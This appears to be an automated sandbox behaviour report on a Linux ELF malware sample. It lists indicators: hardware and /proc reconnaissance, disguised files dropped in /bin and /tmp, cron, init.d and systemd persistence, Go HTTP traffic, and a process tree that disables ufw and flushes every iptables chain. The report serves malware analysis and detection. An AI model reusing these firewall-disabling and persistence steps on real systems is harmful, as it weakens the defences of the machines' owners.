/sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found -
Reads hardware information 1 TTPs 64 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/board_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_date Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag service-agent File opened for reading /sys/devices/virtual/dmi/id/product_uuid Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_type Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_serial service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date service-agent File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_date service-agent File opened for reading /sys/devices/virtual/dmi/id/board_name service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_version service-agent File opened for reading /sys/devices/virtual/dmi/id/chassis_serial Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_version service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_version Process not Found File opened for reading /sys/devices/virtual/dmi/id/chassis_serial service-agent -
Writes file to system bin folder 1 TTPs 42 IoCs
description ioc Process File opened for modification /bin/bprofr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/knlib5 f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf File opened for modification /bin/bprofr cp File opened for modification /bin/initdr cp File opened for modification /bin/bprofr cp File opened for modification /bin/bprofr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/crondr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/initdr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/initdr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/crondr Process not Found File opened for modification /bin/crondr cp File opened for modification /bin/bprofr cp File opened for modification /bin/initdr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr Process not Found File opened for modification /bin/crondr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/initdr cp File opened for modification /bin/bprofr cp File opened for modification /bin/sysdr cp File opened for modification /bin/initdr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/bprofr Process not Found File opened for modification /bin/sysdr cp File opened for modification /bin/crondr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/crondr Process not Found File opened for modification /bin/sysdr Process not Found File opened for modification /bin/crondr cp File opened for modification /bin/bprofr cp File opened for modification /bin/sysdr cp -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size service-agent File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets Process not Found File opened for reading /sys/kernel/mm/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type Process not Found File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size service-agent File opened for reading /sys/bus/cpu/devices service-agent File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq Process not Found File opened for reading /sys/kernel/mm/hugepages Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size service-agent File opened for reading /sys/kernel/mm/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id Process not Found File opened for reading /sys/bus/dax/devices Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition service-agent File opened for reading /sys/bus/node/devices/node0/cpumap service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map Process not Found File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map Process not Found File opened for reading /sys/fs/cgroup/unified/cgroup.controllers Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type Process not Found File opened for reading /sys/bus/dax/target_node Process not Found File opened for reading /sys/bus/node/devices/node0/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size service-agent File opened for reading /sys/kernel/mm/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth Process not Found File opened for reading /sys/bus/cpu/devices service-agent File opened for reading /sys/bus/node/devices/node0/meminfo service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency service-agent File opened for reading /sys/devices/system/node/online Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map Process not Found File opened for reading /sys/bus/dax/target_node Process not Found File opened for reading /sys/bus/cpu/devices Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition service-agent File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map service-agent File opened for reading /sys/fs/cgroup/unified/cgroup.controllers service-agent -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/864/status pkill File opened for reading /proc/89/cmdline ps File opened for reading /proc/8/stat ps File opened for reading /proc/3/status Process not Found File opened for reading /proc/171/cmdline Process not Found File opened for reading /proc/164/status Process not Found File opened for reading /proc/860/stat Process not Found File opened for reading /proc/501/stat ps File opened for reading /proc/16/stat Process not Found File opened for reading /proc/491/status Process not Found File opened for reading /proc/1141/status Process not Found File opened for reading /proc/500/stat Process not Found File opened for reading /proc/616/stat ps File opened for reading /proc/3/stat ps File opened for reading /proc/76/status ps File opened for reading /proc/self/auxv Process not Found File opened for reading /proc/14/stat Process not Found File opened for reading /proc/23/status Process not Found File opened for reading /proc/4169/status ps File opened for reading /proc/615/status ps File opened for reading /proc/1458/status Process not Found File opened for reading /proc/93/status Process not Found File opened for reading /proc/1039/status ps File opened for reading /proc/2/stat ps File opened for reading /proc/1047/cmdline ps File opened for reading /proc/102/stat Process not Found File opened for reading /proc/500/status Process not Found File opened for reading /proc/1703/status pkill File opened for reading /proc/12/stat ps File opened for reading /proc/803/status ps File opened for reading /proc/803/status Process not Found File opened for reading /proc/5495/status Process not Found File opened for reading /proc/200/stat Process not Found File opened for reading /proc/1025/stat ps File opened for reading /proc/1025/cmdline ps File opened for reading /proc/893/stat ps File opened for reading /proc/5233/stat Process not Found File opened for reading /proc/1083/cmdline pgrep File opened for reading /proc/sys/kernel/osrelease Process not Found File opened for reading /proc/1131/cmdline Process not Found File opened for reading /proc/166/status Process not Found File opened for reading /proc/1110/cmdline Process not Found File opened for reading /proc/998/stat Process not Found File opened for reading /proc/174/cmdline Process not Found File opened for reading /proc/1077/cmdline Process not Found File opened for reading /proc/1/environ systemctl File opened for reading /proc/615/status ps File opened for reading /proc/92/status pkill File opened for reading /proc/158/status ps File opened for reading /proc/1/status Process not Found File opened for reading /proc/396/status Process not Found File opened for reading /proc/4164/status ps File opened for reading /proc/692/cmdline Process not Found File opened for reading /proc/175/status Process not Found File opened for reading /proc/1083/cmdline Process not Found File opened for reading /proc/1301/stat ps File opened for reading /proc/1035/status ps File opened for reading /proc/2/cmdline ps File opened for reading /proc/579/status ps File opened for reading /proc/1525/stat Process not Found File opened for reading /proc/864/status pkill File opened for reading /proc/3806/cmdline ps File opened for reading /proc/454/status pkill File opened for reading /proc/84/cmdline pkill -
Writes file to tmp directory 35 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.klibsystem5 Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/sys-helper Process not Found File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.lock service-agent File opened for modification /tmp/sys-helper f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/service-agent Process not Found File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.lock service-agent File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/service-agent f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.lock Process not Found -
GoLang User-Agent 5 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 77 Go-http-client/1.1 HTTP User-Agent header 87 Go-http-client/1.1 HTTP User-Agent header 95 Go-http-client/1.1 HTTP User-Agent header 44 Go-http-client/1.1 HTTP User-Agent header 64 Go-http-client/1.1
Processes
-
/tmp/f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf/tmp/f998aeb84da8b84723ca9fdbdeb565dbc7938bd0a0ce5f0981307b3e24bdf712.elf1⤵
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
PID:1488 -
/usr/bin/bashbash -c "ufw disable"2⤵PID:1504
-
-
/usr/sbin/ufwufw disable2⤵PID:1504
-
/usr/sbin/iptables/usr/sbin/iptables -V3⤵PID:1509
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:1511
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1512
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
PID:1515
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1521
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1530
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1531
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:1532
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1533
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1534
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:1535
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:1537
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:1538
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵PID:1539
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵PID:1540
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵PID:1541
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵PID:1542
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1543
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1544
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1545
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1546
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1547
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1548
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1549
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1550
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1551
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1552
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵PID:1553
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1554
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1555
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1556
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1557
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1558
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1559
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1560
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1561
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1562
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1563
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1564
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:1565
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1566
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1567
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:1568
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:1569
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵PID:1571
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:1572
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:1574
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:1575
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:1576
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1580
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1582
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1586
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1587
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1588
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1590
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1591
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1592
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1595
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1596
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:1598
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1599
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1600
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1601
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1602
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1603
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1604
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1605
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1606
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1607
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1608
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1609
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵PID:1610
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1611
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1612
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1613
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1614
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:1615
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1616
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1617
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:1618
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1619
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1620
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1621
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1622
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1623
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1624
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1625
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1626
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:1627
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1628
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1629
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:1630
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:1631
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵PID:1632
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:1633
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:1634
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:1635
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1636
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1637
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1638
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1639
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1640
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1641
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1642
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1643
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1644
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1645
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1646
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:1647
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1648
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1649
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1650
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1651
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1652
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1653
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1654
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1656
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1658
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1659
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1660
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:1661
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1662
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1663
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:1664
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:1665
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:1666
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1667
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:1668
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵PID:1670
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1671
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1672
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1674
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1675
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1676
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1677
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1679
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1680
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1681
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1682
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1683
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:1685
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1686
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1687
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1688
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1689
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1691
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1692
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1694
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1695
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1696
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1697
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1699
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:1700
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1701
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1702
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1704
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1705
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1706
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1707
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1708
-
-
